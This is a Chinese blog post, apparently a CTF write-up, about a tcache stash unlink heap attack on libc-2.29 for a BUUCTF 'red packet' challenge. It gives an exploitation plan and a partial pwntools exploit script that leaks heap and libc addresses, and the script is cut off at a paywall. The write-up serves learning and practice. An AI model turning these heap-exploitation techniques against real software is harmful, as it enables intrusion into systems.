BUUCTF-PWN刷题记录-24 & libc-2.29学习(下)

最新推荐文章于 2024-08-25 12:49:51 发布
最新推荐文章于 2024-08-25 12:49:51 发布
阅读量1.1k 收藏 5
点赞数 2
分类专栏: CTF知识学习 BUU-PWN 文章标签: libc2.29 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44145820/article/details/106245005
版权
本文详细记录了在不同CTF挑战中利用Tcache stash unlink攻击的技巧,涉及2020新春红包题、hitcon_ctf_2019_one_punch和安恒四月赛(DASCTF)sales_office2。通过分析这些题目,介绍了如何利用栈溢出、指针悬挂和未初始化的Use-After-Free等漏洞,实现堆内存操纵,最终获取libc地址和执行任意代码。
摘要由CSDN通过智能技术生成

目录

[2020 新春红包题]3(Tcache stash unlink attack)

在这里插入图片描述
没有开canary,莫非有栈溢出?
同样把execve禁用了
在这里插入图片描述
删除的时候有指针悬挂
在这里插入图片描述
添加的时候限制了只能添加0x10,0xf0,0x300,0x400大小的
在这里插入图片描述
并且使用calloc分配,这意味着add时不会从tcache中取chunk
在这里插入图片描述
添加次数为0x1c(28),编辑次数为1
在这里插入图片描述
程序存在后门,刚好可以覆盖返回地址
在这里插入图片描述
利用思路如下

  1. 添加释放7次,把大小为0x410的chunk的tcache填满,并且利用show泄露heap_base
  2. 把大小为0x100的chunk放入tcache中6个
  3. 添加0x410大小的chunk并且释放来获得libc地址
  4. 把大小为0x100的chunk放入tcache中2个
  5. 利用UAF修改smallbin2(后进入smallbin的chunk)的bk为qword_4058 + 0x800-0x10
  6. 申请0x100大小的chunk,这样qword_4058 + 0x800-0x10就会写上一个大数
  7. 再申请一个0x410的chunk,写入ROPchain
  8. 利用后门+栈迁移获得flag

Exp:

from pwn import *

r = remote("node3.buuoj.cn", 28846)
#r = process("./RedPacket_SoEasyPwn1/RedPacket_SoEasyPwn1")

context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''	
	where
	''')

elf = ELF("./RedPacket_SoEasyPwn1/RedPacket_SoEasyPwn1")
libc = ELF('./libc/libc-2.29.so')
one_gadget_19 = [0xe237f, 0xe2383, 0xe2386, 0x106ef8]

menu = "Your input: "
def add(index, choice, content):
	r.recvuntil(menu)
	r.sendline('1')
	r.recvuntil("Please input the red packet idx: ")
	r.sendline(str(index))
	r.recvuntil("How much do you want?(1.0x10 2.0xf0 3.0x300 4.0x400): ")
	r.sendline(str(choice))
	r.recvuntil("Please input content: ")
	r.send(content)

def delete(index):
	r.recvuntil(menu)
	r.sendline('2')
	r.recvuntil("Please input the red packet idx: ")
	r.sendline(str(index))


def edit(index, content):
	r.recvuntil(menu)
	r.sendline('3')
	r.recvuntil("Please input the red packet idx: ")
	r.sendline(str(index))
	r.recvuntil("Please input content: ")
	r.send(content)

def show(index):
	r.recvuntil(menu)
	r.sendline('4')
	r.recvuntil("Please input the red packet idx: ")
	r.sendline(str(index))

# fill full tcache size 0x410
for i in range(7):
	add(0,4,'Chunk0')
	delete(0)

# fill 6 in tcache size 0x100
for i in range(6):
	add(1,2,'Chunk1')
	delete(1)


show(0)
last_chunk_addr = u64(r.recvuntil('\n').strip().ljust(8, '\x00'))
heap_addr = last_chunk_addr - 0x26C0
success("heap_base:"+hex(heap_addr))

add(2,4,'Chunk2')
add(3,3,'Chunk3')
delete(2)
show(2)
malloc_hook = u64(r.recvuntil('\n').strip().ljust(8, '\x00')) - 0x60 - 0x10
libc
最低0.47元/天 解锁文章
L.o.W
关注
专栏目录
BUUCTFpwn】解题记录(4-6页持续更新中)
Assassin
08-06 2173
一起继续刷BUUCTF把~
pwn -- glibc-2.29漏洞利用学习
lifanxin的博客
04-30 614
glibc-2.29概述Tcache Stashing Unlink Attack任意位置写入较大值总结 概述   这里记录下版本为libc-2.29.so的漏洞利用方式,一是防止遗忘,二是供大家学习。 Tcache Stashing Unlink Attack   攻击原理和细节代码我就不分析了,着重记录下攻击方式和效果,这里利用tcache stashing unlink attack可以实现两种攻击效果:   1、任意位置写入较大值   2、任意地址chunk分配 任意位置写入较大值   该漏洞发生在
[CTF]-PWN:更换libcpwn题(WSL ubuntu更换libc和ld的方法详解)
2301_79326813的博客
12-09 1047
如果是打远程的话,用的是远程机子的libc和ld,这就是为什么在python exp里用题目给的libc打远程打得通,打本地打不通的原因,题目里的libc只是用于计算地址,不会更改文件的libc,python exp计算地址是一个libc,程序运行又是一个libc,要文件的libc和python exp里计算地址的libc一致才能解题。然后更换题目libc和ld就完成了,可以用ldd查看是否更换完成,如果有not found那就是没更换完成,这样有可能程序无法启动。第五步,更改elf文件的libc和ld。
[DASCTF2024八月开学季!] Crypto
最新发布
Emmaaaaa's blog
08-25 1584
two_squares(n0),矩阵phi,维纳连分数,HNP,中间相遇
[CTF]-PWN:C++文件更换libc方法(WSL)
2301_79326813的博客
02-16 1795
C++文件与C文件更换libc有很多不一样的地方,我是在写buu的ciscn_2019_final_3才意识到这个问题,C文件只需要更换libc和ld就可以了,但是C++文件不同,除了更换libc和ld,它还需要更换libstdc++.so.6和libgcc_s.so.1更换libc和ld的方法我在里讲了,这里就不重复讲了。主要是把更换libstdc++和libgcc的方法讲一下。如果是用虚拟机的话也可以根据wsl的方法改一下路径,也是可以按照这个方法改的。
glibc-2.29
snowleopard_bin的博客
12-10 980
2019 湖湘杯线下 pwn2 off by one ,可以修改size,形成chunk overlap。 #-*- coding:utf-8 -*- from PwnContext import * try: from IPython import embed as ipy except ImportError: print ('IPython not installed...
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4357
BUUCTF刷题记录
BUUCTF-PWN刷题记录25(IO file attack)
weixin_44145820的博客
08-14 1638
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
BUUCTF-PWN刷题记录-22
weixin_44145820的博客
05-18 716
目录ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
BUUCTF-PWN刷题记录-21
weixin_44145820的博客
05-15 712
目录wdb_2018_1st_babyheap(unlink, UAF) wdb_2018_1st_babyheap(unlink, UAF) add的大小固定为0x20 edit机会只有三次 指针悬挂 利用思路如下: 进行几次添加 add(0, (p64(0)+p64(0x31))*2) add(1, 'aaa\n') add(2, 'aaa\n') add(3, 'aaa\n') add(4, '/bin/sh\n') 删除0和1,再删除一次0,此时show(0)能泄露出heap的地址
BUUCTF-PWN刷题记录-6
weixin_44145820的博客
04-14 899
目录picoctf_2018_are you rootciscn_2019_final_2 picoctf_2018_are you root 例行安全检查 菜单如下: 我们需要auth_level等于5才能get flag user结构体如下 struct USER{ char *name; long long auth_level; } 漏洞原理分析: 在login中分配了两次内存...
技巧篇:Tcache stash unlink attack(ubuntu19)
qq_39948058的博客
08-27 235
前言:今天早上刷题的时候,刷到了一道关于Tcache stash unlink attack的技巧篇,其实简单来说就是tc attack,至于unlink就是为了绕过unlink检测,它还有uaf,开启了沙盒,唯一的突破点是orw,orz。。 还是老样,弄了一下别的师傅的exp,自己懒得写啦。。还得调试orz orz、、 exp: #coding:utf-8 from pwn import * #r = remote("node4.buuoj.cn", 27347) r = process("./h
BUUCTF-pwn2_sctf_2016(整数溢出+泄露libc)
半岛铁盒的博客
08-02 554
32位开启了nx保护 没有看到system和‘/bin/sh’,开启了NX保护,是泄露libc类型的题目 main函数就调用了一个vuln函数 7行的输入函数不是get,是程序自定义的函数get_n a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。也就是说我们这边可以输入负数来达到溢出的效果(整数溢出) 一开始输入负数,绕过长度限制,造成溢出 利用printf函数泄露程序的libc版本,去算出system和‘/bin/sh‘的地址 溢出覆盖返回地址去执行sy
BUUCTF--pwn--jarvisoj_level3_x64【ret2libc_64】
qq_73149934的博客
12-05 587
BUUCTF--pwn--jarvisoj_level3_x64
Tcache Stashing Unlink Attack
seaaseesa的博客
05-01 2003
Tcache Stashing Unlink Attack Tcache Stashing Unlink Attack就是calloc的分配不从tcache bin里取chunk,calloc会遍历fastbin、small bin、large bin,如果在tcache bin里,对应的size的bin不为空,则会将这些bin的chunk采用头插法插入到tcache bin里。首先,我们来看一...
pwn】SWPUCTF_2019_p1KkHeap
Nothing
12-10 725
libc-2.27.so下的一道tcache堆题。 例行检查 保护全开。 分析程序,在进入菜单之前,有一个函数跟入查看。 注意到这边用mmap函数在0x66660000映射了一块大小为0x1000的内存空间,权限是rwx。然后用prctl函数做了一个沙箱。我们查看以下禁用了什么调用。 可见execve被禁用,于是system函数和onegadget都不可行。于是就只能自己将shellcode(or...
2021春秋杯pwn题目大解析
MachineGunJoe666
07-03 924
目录 dou_like_pwn libc 漏洞 思路 exp 双边协议@1.5 程序分析 漏洞 思路 EXP dou_like_pwn libc 2.27的libc ld在这里下载 http://archlinux.arkena.net/archive/packages/a/aarch64-linux-gnu-glibc/ 漏洞 功能2只检查了a1<=2, a1可以是负数, 因此产生越界 思路 PtrArr前面一个回环指针 先Read2B修改..
BUUCTFpwn题解(一些栈题+程序分析)
热门推荐
swedsn
01-13 1万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接nc(nc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
buuctf pwn刷题(1)
清霂的博客
01-30 1197
目录1.test_your_nc2.pwn13.warmup_csaw_2016 1.test_your_nc 先用exeinfo查壳,是64位的程序 用64位ida静态分析一下,找到main函数 F5反汇编,看到system("/bin/sh") system()的作用———执行shell命令也就是向dos发送一条指令。 即执行/bin/sh命令,获得shell权限 用虚拟机连node3.buuoj.cn:27191 nc node3.buuoj.cn 27191 查看文件目录 ls 查看flag
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值